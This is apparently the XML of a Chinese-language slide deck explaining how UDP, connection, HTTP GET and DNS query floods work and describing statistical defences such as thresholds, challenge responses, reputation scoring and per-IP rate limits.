              <a:t>UDP Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是日渐猖厥的流量型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击，常见的情况是利用大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>小包冲击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Radius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>认证服务器。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>100k pps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>经常将线路上的骨干设备例如防火墙打瘫，造成整个网段的瘫痪。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议不同，是无连接状态的协议，并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用协议五花八门，差异极大，因此针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的防护非常困难。可行的做法是分析各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用协议，根据协议特性来进行分析。但是多数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用协议并不公开，只有在协议开发者与防拒绝服务厂商进行配合，才有可能做到较好的防护效果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同样的可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正常应用的一些统计特性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(1)UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包在双向基本相等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(2)UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的大小及内容是随机的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发生时，以上两条特性不再满足，即</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同一目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包在一侧大量突现，超过以该目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的两倍以上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(2)UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的大小及内容相对固定。</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01476563-0865-4127-BFDF-28D2C0836849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB3249A0-E506-459A-A340-42F2216B38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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7277FB2-6CFD-4B2A-BA0E-BD4759326F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9E27672-BF36-4261-8940-09833CBFCF1E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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4613EE81-F5D2-406C-9787-DEA74A8E2215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144588" y="685800"/>
            <a:ext cx="4570412" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196611" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4149512-EFC0-4F1F-9CE1-A7F7EF906C20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1552575"/>
            <a:ext cx="8686800" cy="4527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Connection Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是典型的并且非常的有效的利用小流量冲击大带宽网络服务的攻击方式，这种攻击方式目前已经越来越猖獗。这种攻击的原理是利用真实的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址向服务器发起大量的连接，或者建立连接之后很长时间不释放，占用服务器的资源，造成服务器的上服务应用无法响应其他客户所发起的连接。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对“残余连接”耗尽的防护能力。黑洞跟踪每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接的状态变化，一旦发现某个状态超时，就向服务器发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP Rst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包以释放服务器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SOCKET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>资源。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对“并发连接”耗尽的防护能力。一旦某个源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的累计存活连接数超过设定值就将来自该源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的以往连接切断，这样做防止单个源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>占用服务器的大量资源，使服务器可以为更多的客户提供服务。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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A349A489-C47A-44D5-A976-207AF9588283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144588" y="685800"/>
            <a:ext cx="4570412" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198659" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B39BC22E-B0AA-4605-94FA-36E17973356A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1552575"/>
            <a:ext cx="8686800" cy="4527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r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP Get Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防护</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP Get Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常是利用代理服务器作为傀儡主机向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务发起大量的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求。由于很多网站使用动态页面的技术，通常一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求可能引发后台数据库的查询操作等，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数量增加到一定程度时，数据库服务器将不堪重负，导致动态页面无法响应，达到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的目的。这种攻击方式对静态页面的效果不是很明显。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据攻击的原理，可以构造这样的防护模型：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对网络数据包进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议解码，分析出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求及其参数（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>统计到达每个服务器的每秒钟的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求数，如果超过设定的阈值触发防护机制：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求是否来自代理服务器；如果是，则直接回应一个带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的响应要求请求发起端作出相应的回馈。如果发起端并不响应则说明是利用工具发起的请求，这样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求就无法到达服务器，达到防护的效果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果请求不是来自代理服务器，则根据历史统计的结果计算可能是恶意请求的概率，若超过一定的概率则回应一个带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的响应要求请求发起端作出相应的回馈。如果发起端并不响应则说明是利用工具发起的请求，这样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求就无法到达服务器，达到防护的效果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据微软的统计数据，一台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器所能承受的动态域名查询的上限是每秒钟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>9000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个请求。而我们知道，在一台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>P3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>机上可以轻易地构造出每秒钟几万个域名解析请求，足以使一台硬件配置极高的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器瘫痪，由此可见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器的脆弱性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结合统计方法，构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS Query Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防护模块：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>统计域名解析的频度：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>域名解析成功的比率；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同一域名解析的次数；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>记录域名查询失败的次数，建立域名信誉机制；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自学习解析结果，记录域名和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的对应关系；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据设定的阈值触发防护机制：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据域名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自学习结果主动回应，减轻服务器负载（黑洞内建高速 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS Cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据域名信誉机制过滤部分解析请求；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>部分请求交由服务器解析，并记录解析的结果；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对突然发起大量频度较低的域名解析请求的源 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址进行带宽限制；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结合 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信誉机制，在攻击发生时降低很少发起域名解析请求的源 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址的优先级；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>限制每个源 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址每秒的域名解析请求次数；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E20510-18E1-40EA-8D6A-1C69005B2374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206851" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D2268-F40C-4D86-AB4C-F9D6EEDC7AA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防护失败，需要购买高级防护措施。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206852" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{207AC078-191C-4742-8000-E9843FE3B6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04587129-EBA4-4A2F-909D-DC41AE6C94C1}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E23E5516-40C3-49AA-BBD4-E51CB0A2FB47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208899" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E09D076-7853-4F11-A147-4B0D7D08C24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阿里云高防</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
